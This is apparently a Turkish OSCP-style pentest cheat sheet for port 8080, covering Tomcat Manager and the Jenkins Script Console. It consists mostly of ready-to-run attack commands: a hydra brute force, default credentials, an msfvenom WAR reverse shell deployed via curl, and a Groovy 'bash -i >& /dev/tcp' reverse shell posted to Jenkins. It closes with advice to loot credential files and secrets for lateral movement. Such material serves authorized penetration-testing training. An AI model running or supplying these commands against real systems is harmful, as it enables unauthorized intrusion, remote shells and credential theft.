8080
HTTP-alt (Tomcat / Jenkins / Proxy)
linuxAlternatif HTTP portu; sıklıkla Apache Tomcat manager, Jenkins, ya da uygulama/proxy arayüzü barındırır. Varsayılan kimlik bilgileri, Tomcat manager WAR deploy ve Jenkins Script Console üzerinden RCE klasik OSCP foothold yollarıdır.
┌──
Komutlar
nmap ✓ EXAM-SAFE
nmap -sV -p 8080 --script=http-title,http-headers,http-enum {{RHOST}} 8080 servis sürüm + başlık/dizin enumerasyonu (Tomcat/Jenkins ayırımı) HackTricks — Pentesting Tomcat
whatweb ✓ EXAM-SAFE
whatweb {{URL}} Arkadaki uygulamayı belirleme (Apache-Coyote=Tomcat, X-Jenkins=Jenkins) HackTricks — Jenkins
feroxbuster ✓ EXAM-SAFE
feroxbuster -u {{URL}} -w {{WORDLIST}} -t 50 /manager, /host-manager, /script, /api gibi yönetim yollarını keşfetme HackTricks — Pentesting Tomcat
curl ✓ EXAM-SAFE
curl -s -u {{USER}}:{{PASS}} {{URL}}/manager/html Tomcat Manager arayüzüne kimlik bilgisiyle erişim testi HackTricks — Pentesting Tomcat
hydra ✓ EXAM-SAFE
hydra -L {{WORDLIST}} -P {{WORDLIST}} -f {{RHOST}} -s {{RPORT}} http-get /manager/html Tomcat Manager HTTP basic auth hedefli brute force HackTricks — Pentesting Tomcat
msfvenom ✓ EXAM-SAFE
msfvenom -p java/jsp_shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f war -o shell.war Tomcat deploy için WAR reverse shell payload üretimi HackTricks — Pentesting Tomcat
curl ✓ EXAM-SAFE
curl -s -u {{USER}}:{{PASS}} -T shell.war '{{URL}}/manager/text/deploy?path=/shell' WAR shell'i Tomcat Manager text API üzerinden deploy etme (RCE) HackTricks — Pentesting Tomcat
curl ✓ EXAM-SAFE
curl -s {{URL}}/script Jenkins Groovy Script Console erişim/anonim yetki kontrolü (RCE yüzeyi) HackTricks — Jenkins
curl ✓ EXAM-SAFE
curl -s -d 'script=def proc=["/bin/bash","-c","bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1"].execute();proc.waitFor()' {{URL}}/scriptText Jenkins Script Console Groovy ile reverse shell tetikleme PayloadsAllTheThings — Jenkins
Genel Bakış
8080 portu standart web enumerasyonunun yanı sıra özellikle Apache Tomcat, Jenkins ve uygulama proxy’leri için kontrol edilmelidir. Bu servisler default credential ve yönetim arayüzü RCE’leriyle hızlı foothold sağlar. Önce whatweb/nmap ile servisi tanımlayın, sonra ilgili yola özelleşin.
Genel HTTP Enumerasyon
whatwebve nmaphttp-title/http-headersile arkadaki uygulamayı belirleyin (Server: Apache-Coyote -> Tomcat, X-Jenkins başlığı -> Jenkins).feroxbuster/ffufile gizli yolları (/manager,/host-manager,/script,/api) keşfedin.
Apache Tomcat
/manager/htmlve/host-manager/htmlarayüzlerini kontrol edin; manuel erişim veya nmap http-tomcat kontrolleri.- Default creds:
tomcat:tomcat,admin:admin,tomcat:s3cret.hydraile manager HTTP basic auth’a hedefli brute force yapın (gürültüye dikkat). - Erişim varsa
msfvenomile WAR reverse shell üretip/manager/text/deployüzerinden curl ile yükleyin ve tetikleyin — bu klasik Tomcat RCE’dir (msfvenom payload üretimi safe; Metasploit modülü kullanımı restricted).
Jenkins
/scriptGroovy Script Console’a erişim varsa doğrudan OS komut çalıştırılabilir (RCE). Anonim okuma/yazma yetkisi sıkça açık bırakılır.- Login varsa default/zayıf creds deneyin; ardından Script Console üzerinden reverse shell Groovy payload’u çalıştırın.
- Sürüm görünürse bilinen CVE’leri (örn. CVE-2018-1000861, CVE-2024-23897 dosya okuma) araştırın. [UNVERIFIED] hedef sürüme göre exploit uygunluğunu doğrulayın.
Pivot / Loot
- Tomcat
tomcat-users.xmlve Jenkinscredentials.xml/secrets/dizinleri şifrelenmiş ama çözülebilir kimlik bilgileri barındırır; shell sonrası mutlaka toplayın. - Jenkins genelde CI servis hesabıyla çalışır; elde edilen token/SSH anahtarları lateral movement için değerlidir.
- Servis çoğu zaman ayrıcalıklı (tomcat/jenkins) kullanıcıyla koşar — local privesc için sudo/SUID/capabilities enumerasyonuna geçin.
┌──
İlgili teknikler
OS Command Injection ve SSTI — Jinja2/Twig/Freemarker RCEFile Upload Bypass — Uzantı, Magic Bytes, Content-Type ve .htaccess ile WebshellLinux PrivEsc Enumeration Metodolojisi (linpeas / LinEnum / pspy / Manuel Checklist)Linux Reverse & Bind Shell CephaneliğiServis Exploit & Varsayılan Kimlik Bilgisi İş Akışı
┌──